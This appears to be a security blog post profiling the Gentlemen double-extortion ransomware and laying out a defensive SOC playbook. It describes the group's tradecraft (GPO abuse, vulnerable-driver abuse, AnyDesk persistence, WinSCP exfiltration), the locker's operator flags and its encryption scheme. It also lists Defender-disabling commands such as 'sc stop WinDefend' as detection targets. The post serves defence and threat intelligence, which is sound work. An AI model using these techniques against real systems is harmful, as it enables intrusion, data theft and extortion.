Posted in

Gentlemen Ransomware: Inside the 2025 Double‑Extortion Threat Targeting

by Rakesh0

Ransomware activity surged across 2025, with research noting a 126% year‑over‑year increase in the first quarter—a reminder that fast‑evolving crews can outpace traditional controls. Among the most active newcomers is Gentlemen ransomware, a double‑extortion operation first observed in August 2025 that quickly expanded across at least 17 countries and multiple sectors (manufacturing, healthcare, construction, insurance).

In this guide, you’ll learn what Gentlemen is, how it works, the TTPs it uses (GPO manipulation, BYOVD), crypto scheme and execution flow, detection ideas, and actionable steps mapped to MITRE ATT&CK and aligned to NIST/ISO practices—so your SOC and leadership can respond decisively.

What is Gentlemen Ransomware? (Definition & Context)

Gentlemen is an enterprise‑focused ransomware operation that steals data before encrypting it (double extortion), then threatens disclosure on a dark‑web leak site to coerce payment—even if victims have recoverable backups.

Key characteristics:

  • Target profile: Medium‑to‑large organizations across global regions; notable activity in North and South America, APAC, Middle East.
  • Operational maturity: Tailored toolchains, domain‑wide deployment via GPO, and legitimate driver abuse for defense evasion.
  • Development language: The locker is written in Go, enabling cross‑platform builds and rapid iteration across enterprise environments.

Why this matters: The group’s mix of Active Directory tradecraft and kernel‑level evasion (BYOVD) means standard endpoint agents and default AD configurations are often insufficient.

How Gentlemen Breaks In and Moves: TTPs & Attack Chain

Initial Access & Recon

  • Valid accounts (compromised credentials) and exposed infrastructure (e.g., FortiGate) have been observed as access vectors.
  • Internal recon leveraging tools like Advanced IP Scanner and batch/Powershell enumeration to map domain admins and privileged groups.

Defense Evasion: BYOVD & Kill‑AV Tooling

  • Abuse of legitimate signed drivers (e.g., ThrottleBlood.sys) to terminate protected security processes at kernel level—a classic Bring Your Own Vulnerable Driver (BYOVD) technique.
  • The broader 2025 landscape saw multiple BYOVD campaigns exploiting Microsoft‑signed drivers (e.g., Paragon’s BioNTdrv.sys CVE‑2025‑0289), underscoring why driver allowlists/blocklists are now a must‑have.

Domain‑Wide Propagation: GPO Abuse

  • Group Policy Objects (GPOs) are modified to deploy payloads, scheduled tasks, and policy changes across the domain, enabling rapid lateral movement and mass encryption.
  • MITRE ATT&CK maps this behavior to T1484.001 – Domain Policy Modification: Group Policy Modification.

Persistence & Exfiltration

  • AnyDesk for remote access and registry modifications for persistence; WinSCP over encrypted channels used for data exfiltration pre‑encryption.

Expert takeaway: Harden AD, lock down GPO permissions, and enforce driver blocklists. These two control planes (AD policy + kernel drivers) are where Gentlemen wins early.

Execution & Encryption: How the Locker Operates

Command‑Line Controlled Execution

Gentlemen enforces strict argument parsing at start. If a required --password is missing or invalid, the process terminates immediately, thwarting sandbox analysis and accidental runs. Operators can toggle scope and stealth with arguments like --silent, --full, --system, --shares, --fast, and --ultrafast.

Before encryption, the malware disables Microsoft Defender and stops backup/database services (e.g., Veeam, MSSQL, MongoDB) to unlock files and impede recovery.

Reality check: Attackers commonly use PowerShell/CLI to alter Defender preferences or stop services; this aligns with documented methods for Defender control (legitimate admin usage) that adversaries emulate.

Operator Arguments (Examples)

ArgumentPurposeNotes
--password <value>Mandatory run‑time credential; exits if invalidAnti‑analysis gatekeeping
--silentSuppress file renaming / reduce noiseDefense evasion
--fullTarget local + network sharesMaximizes impact
--system, --sharesScope targeting of system paths or SMB sharesOperator control
--fast, --ultrafastPartial encryption percentages for large filesSpeed vs. impact trade‑off

Cryptography: X25519 + XChaCha20

Gentlemen uses a hybrid scheme: X25519 for key exchange (shared secret derivation) and XChaCha20 for file content encryption. Unique keys per file and in‑memory decoding of the attacker’s public key complicate forensic recovery. Small files are fully encrypted; large files get selective segment encryption (~9% for --fast, ~1% for --ultrafast) to maximize speed while maintaining unrecoverability.

Ransom Artifact

A note README-GENTLEMEN.txt is dropped in affected directories; some victims report desktop wallpaper changes and a TOX contact in the note.

Real‑World Observations & Case Notes

  • Trend Micro documented domain‑wide compromise via GPO, driver abuse, custom Kill‑AV utilities (e.g., All.exe, Allpatch2.exe), and encrypted exfiltration via WinSCP with AnyDesk persistence.
  • Reports consolidate 17+ countries affected and industry spread (manufacturing, healthcare, construction, insurance).
  • Threat profiles from Broadcom (Symantec) and BlackpointCyber reference dropped notes, file extensions, and enterprise behaviors consistent with double extortion and service termination.
  • Third‑party Threat Intel pieces highlight leak‑site activity and ongoing RaaS‑like evolution with XChaCha20 and ESXi lockers—a sign the operation is iterating rapidly.

Bottom line: Gentlemen combines AD tradecraft, kernel‑level evasion, and optimized crypto—a triad that compresses dwell time and increases blast radius.

Common Mistakes & Misconceptions

  1. “EDR is enough.”
    Not when GPOs can push scheduled tasks domain‑wide and BYOVD drops kernel drivers that kill EDR processes. Driver blocklists and GPO write‑permission hygiene are non‑negotiable.
  2. “Backups alone mitigate double extortion.”
    Backups won’t solve data‑leak pressure or regulatory exposure. You need DLP, segmented exfil monitoring, and legal/comms playbooks.
  3. “AD changes are noisy—we’ll notice.”
    Attackers often encode PowerShell, use legitimate consoles (GPMC), and alter registry/policies quietly. Continuous GPO change monitoring is essential.
  4. “Tamper protection stops all Defender modification.”
    Kernel‑level techniques can bypass or terminate agents. Combine device control, kernel driver policies, and allow‑listing to raise the floor.

Best Practices & Actionable Steps (SOC Playbook)

1) Harden Active Directory & GPO

  • Restrict GPO write/modify to least‑privileged admins; monitor T1484.001‑aligned changes (new scheduled tasks, script deployments, policy links).
  • Audit SYSVOL for unauthorized scripts and NETLOGON shares for droppers.

2) Stop BYOVD at the Door

  • Enable Microsoft’s Vulnerable Driver Blocklist across endpoints; maintain device control to block unsigned/unknown drivers. 2025 BYOVD campaigns exploited Microsoft‑signed Paragon drivers—block known bad hashes.
  • Monitor driver load events (Kernel callbacks) and unexpected service installs (SC/SCHTASKS usage).

3) Kill the Kill‑AV

  • Detect attempts to stop Defender, alter MpPreference, or terminate AV/EDR services (e.g., Set-MpPreference, sc stop WinDefend, or suspicious TrustedInstaller‑level actions).

4) Detections & Threat Hunting (Mapped to ATT&CK)

  • GPO modification: alert on new ScheduledTasks.xml and GptTmpl.inf changes; watch for Base64 PowerShell tied to GPO edits. (ATT&CK T1484.001).
  • Service/Process termination: sequences targeting backup (Veeam), DB services (MSSQL/MongoDB) prior to encryption.
  • Exfil channels: WinSCP executions with outbound SFTP to unknown hosts.
  • Argumented locker runs: processes with --password, --full, --fast, --ultrafast flags.

5) Crypto & Key‑Management Readiness

  • Assume per‑file keys with X25519/XChaCha20; victim‑side decryption without TA keys is infeasible. Ensure KMS and HSM workflows are segregated and not AD‑reachable to avoid GPO push risks.

6) Resilience & Response

  • Isolate AD quickly; disable compromised accounts; block policy propagation where possible.
  • Execute containment runbooks for backup servers and DB clusters likely targeted pre‑encryption.
  • Prepare legal/compliance steps for breach notification due to exfil.

Tools, Frameworks & Standards

  • MITRE ATT&CK: Track T1484.001 (GPO modification), T1562 (Impair Defenses), T1021 (Remote Services), T1219 (Remote Access Software) across detections.
  • NIST CSF 2.0 / SP 800‑53: Emphasize PR.AC (Access Control) for AD/GPO rights, DE.AE (Anomalies & Events) for policy changes, PR.PT (Protective Technology) for driver/device controls.
  • ISO/IEC 27001 Annex A: Controls around change management, logging/monitoring, supplier relationships for EDR/AV driver veracity.
  • SOC rule content: Providers like SOC Prime publish Sigma rules for Gentlemen mapped to ATT&CK, easing SIEM deployment.

Gentlemen vs. Your Environment: Risk‑Impact Snapshot

  • Likelihood: Elevated for orgs with flat AD, weak GPO governance, and uncontrolled driver installs.
  • Impact: Operational disruption (services killed), data breach/regulatory risk (exfil + leak), rapid domain‑wide spread via GPO.
  • Time to impact: Minutes to hours once GPO control is obtained; partial encryption modes accelerate blast radius.

Frequently Asked Questions (FAQs)

Q1. Is Gentlemen a RaaS (Ransomware‑as‑a‑Service)?
Evidence is mixed; some intel notes rapid evolution and leak‑site growth reminiscent of RaaS, including XChaCha20 lockers and ESXi capability, while other briefs caution the model isn’t conclusively RaaS.

Q2. What makes Gentlemen hard to analyze?
The mandatory --password flag kills execution without the right value, and operators adjust partial encryption percentages to speed attacks—hindering sandboxing and slowing reverse engineering.

Q3. Which services are typically terminated pre‑encryption?
Microsoft Defender, Veeam, MSSQL, MongoDB (among others) are commonly targeted to unlock files and impede recovery.

Q4. How does the crypto scheme affect recovery?
With X25519 key exchange and per‑file XChaCha20 keys, decryption without TA keys is not feasible; partial encryption for large files still destroys integrity.

Q5. What artifacts signal Gentlemen?
Look for README-GENTLEMEN.txt ransom notes, TOX contact IDs, driver loads tied to Kill‑AV, and GPO changes deploying scheduled tasks or scripts domain‑wide.

Q6. Which ATT&CK techniques should we prioritize?
Start with T1484.001 (GPO Modification), T1562 (Impair Defenses), T1219 (Remote Access Software), T1021 (Remote Services) in your hunt queries.

Conclusion & Next Steps

Gentlemen ransomware blends AD/GPO mastery, kernel‑level evasion, and optimized encryption to overwhelm unprepared enterprises. The fix isn’t a single product; it’s a programmatic hardening of AD/GPO, driver governance, battle‑tested detections, and practiced IR playbooks.

Soft CTA:

  • Assess AD/GPO exposure and driver policies this week.
  • Deploy ATT&CK‑mapped detections (Sigma rules), then tabletop double‑extortion scenarios with legal/PR.
  • Want a Sigma bundle and GPO monitoring checklist customized for your stack? I can draft both for you.
Subscribe

Leave a Reply

Your email address will not be published. Required fields are marked *